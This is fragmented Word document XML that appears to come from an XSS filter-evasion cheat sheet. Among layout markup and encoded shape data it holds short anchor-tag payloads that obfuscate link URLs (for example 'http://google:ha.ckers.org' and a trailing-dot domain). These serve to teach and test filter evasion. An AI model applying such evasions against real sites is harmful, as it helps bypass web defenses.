      </w:r>
      <w:r>
        <w:t>only,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because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implementation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"feeling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>lucky"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>function.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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requires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#1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Google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keyword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question</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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"google"):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="11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4707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116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2399665" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="506" name="Group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9665" cy="116205"/>
                          <a:chOff x="1614" y="183"/>
                          <a:chExt cx="3779" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="507" name="Freeform 509"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="182"/>
                            <a:ext cx="3779" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5372 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3779"/>
                              <a:gd name="T2" fmla="+- 0 365 183"/>
                              <a:gd name="T3" fmla="*/ 365 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3779"/>
                              <a:gd name="T6" fmla="+- 0 365 183"/>
                              <a:gd name="T7" fmla="*/ 365 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3779"/>
                              <a:gd name="T10" fmla="+- 0 364 183"/>
                              <a:gd name="T11" fmla="*/ 364 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3779"/>
                              <a:gd name="T14" fmla="+- 0 344 183"/>
                              <a:gd name="T15" fmla="*/ 344 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3779"/>
                              <a:gd name="T18" fmla="+- 0 341 183"/>
                              <a:gd name="T19" fmla="*/ 341 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3779"/>
                              <a:gd name="T22" fmla="+- 0 204 183"/>
                              <a:gd name="T23" fmla="*/ 204 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3779"/>
                              <a:gd name="T26" fmla="+- 0 183 183"/>
                              <a:gd name="T27" fmla="*/ 183 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5372 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3779"/>
                              <a:gd name="T30" fmla="+- 0 183 183"/>
                              <a:gd name="T31" fmla="*/ 183 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5393 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3779"/>
                              <a:gd name="T34" fmla="+- 0 204 183"/>
                              <a:gd name="T35" fmla="*/ 204 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5393 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3779"/>
                              <a:gd name="T38" fmla="+- 0 344 183"/>
                              <a:gd name="T39" fmla="*/ 344 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5375 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3779"/>
                              <a:gd name="T42" fmla="+- 0 364 183"/>
                              <a:gd name="T43" fmla="*/ 364 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5372 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3779"/>
                              <a:gd name="T46" fmla="+- 0 365 183"/>
                              <a:gd name="T47" fmla="*/ 36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779" h="183">
                                <a:moveTo>
                                  <a:pt x="375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758" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3779" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3779" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3761" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="375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Text Box 508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82"/>
                            <a:ext cx="377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HREF="http://google:ha.ckers.org"&gt;XSS&lt;/A&gt;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7" o:spid="_x0000_s1917" style="position:absolute;margin-left:80.7pt;margin-top:9.15pt;width:188.95pt;height:9.15pt;z-index:-15569408;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,183" coordsize="377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">
                <v:shape id="Freeform 509" o:spid="_x0000_s1918" style="position:absolute;left:1614;top:182;width:3779;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="377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fkG8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvOlGUVuiq4RCRUEK2l68PbPP&#10;JJh9G7Jrsv57Vyj0OMzMN8xyHUwtOmpdZVnBeJSAIM6trrhQ8PvzNfwA4TyyxtoyKbiTg/Xq9WWJ&#10;qbY9H6g7+kJECLsUFZTeN6mULi/JoBvZhjh6F9sa9FG2hdQt9hFuajlJkrk0WHFcKLGhz5Ly6/Fm&#10;FOiz7ajnMMuy02l30d+T/TRslBq8hWwBwlPw/+G/9lYrmCXv8DwTj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X5BvEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3758,182l21,182r-3,-1l,161r,-3l,21,21,,3758,r21,21l3779,161r-18,20l3758,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3758,365;21,365;18,364;0,344;0,341;0,204;21,183;3758,183;3779,204;3779,344;3761,364;3758,365" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 508" o:spid="_x0000_s1919" type="#_x0000_t202" style="position:absolute;left:1614;top:182;width:377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fx8MEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m4mDyaxGEdlAGIi1Hjw+m2cb&#10;bF66Jmr335uDsOPH93u+7F0jbtQF61nDeKRAEJfeWK40HIrvt08QISIbbDyThj8KsFwMXuaYGX/n&#10;nG77WIkUwiFDDXWMbSZlKGtyGEa+JU7c2XcOY4JdJU2H9xTuGvmu1EQ6tJwaamxpXVN52V+dhtWR&#10;8y/7uz3t8nNui2Kq+Gdy0fp12K9mICL18V/8dG+Mhg+V1qY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8fDBAAAA3A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8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HREF="http://google:ha.ckers.org"&gt;XSS&lt;/A&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Removing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CNAMEs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="136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102" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154"/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15891456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3201035</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="262890" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="503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890" cy="116205"/>
                          <a:chOff x="5041" y="108"/>
                          <a:chExt cx="414" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="504" name="Freeform 506"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="5040" y="108"/>
                            <a:ext cx="414" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5433 5041"/>
                              <a:gd name="T1" fmla="*/ T0 w 414"/>
                              <a:gd name="T2" fmla="+- 0 290 108"/>
                              <a:gd name="T3" fmla="*/ 290 h 183"/>
                              <a:gd name="T4" fmla="+- 0 5062 5041"/>
                              <a:gd name="T5" fmla="*/ T4 w 414"/>
                              <a:gd name="T6" fmla="+- 0 290 108"/>
                              <a:gd name="T7" fmla="*/ 290 h 183"/>
                              <a:gd name="T8" fmla="+- 0 5059 5041"/>
                              <a:gd name="T9" fmla="*/ T8 w 414"/>
                              <a:gd name="T10" fmla="+- 0 290 108"/>
                              <a:gd name="T11" fmla="*/ 290 h 183"/>
                              <a:gd name="T12" fmla="+- 0 5041 5041"/>
                              <a:gd name="T13" fmla="*/ T12 w 414"/>
                              <a:gd name="T14" fmla="+- 0 269 108"/>
                              <a:gd name="T15" fmla="*/ 269 h 183"/>
                              <a:gd name="T16" fmla="+- 0 5041 5041"/>
                              <a:gd name="T17" fmla="*/ T16 w 414"/>
                              <a:gd name="T18" fmla="+- 0 266 108"/>
                              <a:gd name="T19" fmla="*/ 266 h 183"/>
                              <a:gd name="T20" fmla="+- 0 5041 5041"/>
                              <a:gd name="T21" fmla="*/ T20 w 414"/>
                              <a:gd name="T22" fmla="+- 0 129 108"/>
                              <a:gd name="T23" fmla="*/ 129 h 183"/>
                              <a:gd name="T24" fmla="+- 0 5062 5041"/>
                              <a:gd name="T25" fmla="*/ T24 w 414"/>
                              <a:gd name="T26" fmla="+- 0 108 108"/>
                              <a:gd name="T27" fmla="*/ 108 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5433 5041"/>
                              <a:gd name="T29" fmla="*/ T28 w 414"/>
                              <a:gd name="T30" fmla="+- 0 108 108"/>
                              <a:gd name="T31" fmla="*/ 108 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5454 5041"/>
                              <a:gd name="T33" fmla="*/ T32 w 414"/>
                              <a:gd name="T34" fmla="+- 0 129 108"/>
                              <a:gd name="T35" fmla="*/ 129 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5454 5041"/>
                              <a:gd name="T37" fmla="*/ T36 w 414"/>
                              <a:gd name="T38" fmla="+- 0 269 108"/>
                              <a:gd name="T39" fmla="*/ 269 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5436 5041"/>
                              <a:gd name="T41" fmla="*/ T40 w 414"/>
                              <a:gd name="T42" fmla="+- 0 290 108"/>
                              <a:gd name="T43" fmla="*/ 290 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5433 5041"/>
                              <a:gd name="T45" fmla="*/ T44 w 414"/>
                              <a:gd name="T46" fmla="+- 0 290 108"/>
                              <a:gd name="T47" fmla="*/ 29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4" h="183">
                                <a:moveTo>
                                  <a:pt x="392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92" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="413" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39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108"/>
                            <a:ext cx="41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41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hyperlink r:id="rId72">
                                <w:r>
                                  <w:rPr>
                                    <w:rFonts w:ascii="Lucida Console"/>
                                    <w:color w:val="36454E"/>
                                    <w:w w:val="95"/>
                                    <w:sz w:val="15"/>
                                  </w:rPr>
                                  <w:t>www.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4" o:spid="_x0000_s1920" style="position:absolute;left:0;text-align:left;margin-left:252.05pt;margin-top:5.4pt;width:20.7pt;height:9.15pt;z-index:15891456;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="5041,108" coordsize="41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">
                <v:shape id="Freeform 506" o:spid="_x0000_s1921" style="position:absolute;left:5040;top:108;width:414;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="41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Xe/cUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzYrCQBCE7wu+w9CCt3Wi6CLRUVR2MYgg/hw8Npk2&#10;CWZ6QmY08e0dQdhjUV1fdc0WrSnFg2pXWFYw6EcgiFOrC84UnE9/3xMQziNrLC2Tgic5WMw7XzOM&#10;tW34QI+jz0SAsItRQe59FUvp0pwMur6tiIN3tbVBH2SdSV1jE+CmlMMo+pEGCw4NOVa0zim9He8m&#10;vHHfPU9Js6uGq832d32+JH67HynV67bLKQhPrf8//qQTrWAcjeA9JhBAz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td79xQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m392,182r-371,l18,182,,161r,-3l,21,21,,392,r21,21l413,161r-18,21l392,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="392,290;21,290;18,290;0,269;0,266;0,129;21,108;392,108;413,129;413,269;395,290;392,290" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 505" o:spid="_x0000_s1922" type="#_x0000_t202" style="position:absolute;left:5040;top:108;width:41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ebsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE70L/Q3iF3jSpoNitUUQUCkLpuj30+Lp5&#10;7gY3L+sm6vrvm4LgcZiZb5j5sneNuFAXrGcNryMFgrj0xnKl4bvYDmcgQkQ22HgmDTcKsFw8DeaY&#10;GX/lnC77WIkE4ZChhjrGNpMylDU5DCPfEifv4DuHMcmukqbDa4K7Ro6VmkqHltNCjS2tayqP+7PT&#10;sPrhfGNPn79f+SG3RfGmeDc9av3y3K/eQUTq4yN8b38YDRM1gf8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l5u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41"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:hyperlink r:id="rId73">
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Lucida Console"/>
                              <w:color w:val="36454E"/>
                              <w:w w:val="95"/>
                              <w:sz w:val="15"/>
                            </w:rPr>
                            <w:t>www.</w:t>
                          </w:r>
                        </w:hyperlink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When</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>combined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above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>removing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>servers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properly):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>save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additional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bytes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total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>savings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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for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num="2" w:space="708" w:equalWidth="0">
            <w:col w:w="3585" w:space="297"/>
            <w:col w:w="5138"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8" w:after="1"/>
        <w:rPr>
          <w:sz w:val="13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1975485" cy="116205"/>
                <wp:effectExtent l="5715" t="3175" r="0" b="4445"/>
                <wp:docPr id="500" name="Group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5485" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3111" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="501" name="Freeform 50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11" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 3089 w 3111"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 3111"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 3111"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 3111"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 3111"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 3111"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 3111"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 3089 w 3111"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 3110 w 3111"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 3110 w 3111"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 3092 w 3111"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 3089 w 3111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3111" h="183">
                                <a:moveTo>
                                  <a:pt x="308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089" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3110" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3110" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3092" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="308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Text Box 50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1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0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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId74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http://google.com/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"&gt;XSS&lt;/A&gt;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1" o:spid="_x0000_s1923" style="width:155.55pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="311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">
                <v:shape id="Freeform 503" o:spid="_x0000_s1924" style="position:absolute;width:3111;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="311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hNWcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3WTgqWNriIGQSw91Hrx9sg+&#10;syHZt2l2ddN/3y0Uehxm5htmtRltJ+40+MaxgnyegSCunG64VnD+3D++gPABWWPnmBR8k4fNevKw&#10;wkK7yB90P4VaJAj7AhWYEPpCSl8ZsujnridO3tUNFkOSQy31gDHBbSefsuxZWmw4LRjsaWeoak83&#10;q+C2v7yV5bupKO9j+9WWMT++RqVm03G7BBFoDP/hv/ZBK1hkOfyeS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GE1ZxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3089,182l21,182r-3,l,161r,-3l,21,21,,3089,r21,21l3110,161r-18,21l3089,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3089,182;21,182;18,182;0,161;0,158;0,21;21,0;3089,0;3110,21;3110,161;3092,182;3089,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 502" o:spid="_x0000_s1925" type="#_x0000_t202" style="position:absolute;width:311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/GGsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE7wX/Q3iCt5pUUOrWKCItCELpuh56fN08&#10;d4Obl3UTdf33TaHgcZiZb5jFqneNuFIXrGcNL2MFgrj0xnKl4VB8PL+CCBHZYOOZNNwpwGo5eFpg&#10;ZvyNc7ruYyUShEOGGuoY20zKUNbkMIx9S5y8o+8cxiS7SpoObwnuGjlRaiYdWk4LNba0qak87S9O&#10;w/qb83d7/vz5yo+5LYq54t3spPVo2K/fQETq4yP8394aDVM1g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z8Ya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70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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId75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http://google.com/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"&gt;XSS&lt;/A&gt;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3"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Extra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dot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absolute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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4809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2237740" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="497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7740" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="3524" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="498" name="Freeform 500"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="3524" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5117 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3524"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3524"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3524"/>
                              <a:gd name="T10" fmla="+- 0 421 240"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3524"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3524"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3524"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3524"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5117 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3524"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5138 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3524"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5138 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3524"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5120 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3524"/>
                              <a:gd name="T42" fmla="+- 0 421 240"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5117 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3524"/>
                              <a:gd name="T46" fmla="+- 0 422 240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24" h="183">
                                <a:moveTo>
                                  <a:pt x="350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503" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3524" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3506" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="350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Text Box 499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39"/>
                            <a:ext cx="352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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId76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http://www.google.com./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"&gt;XSS&lt;/A&gt;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8" o:spid="_x0000_s1926" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:176.2pt;height:9.15pt;z-index:-15568384;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="352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">
                <v:shape id="Freeform 500" o:spid="_x0000_s1927" style="position:absolute;left:1614;top:239;width:3524;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="352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cNZsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwU7DMAyG70i8Q+RJ3Fi6CjpWlk0VEgKObJO4eo3X&#10;ViRO1YS28PT4gMTR+v1//rzdz96pkYbYBTawWmagiOtgO24MnI7Ptw+gYkK26AKTgW+KsN9dX22x&#10;tGHidxoPqVEC4ViigTalvtQ61i15jMvQE0t2CYPHJOPQaDvgJHDvdJ5lhfbYsVxosaenlurPw5cX&#10;Ddevzx8vo6vOxU/BVf7m8+nemJvFXD2CSjSn/+W/9qs1cLcRW3lGCK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nDWbEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m3503,182l21,182r-3,-1l,161r,-3l,21,21,,3503,r21,21l3524,161r-18,20l3503,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3503,422;21,422;18,421;0,401;0,398;0,261;21,240;3503,240;3524,261;3524,401;3506,421;3503,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
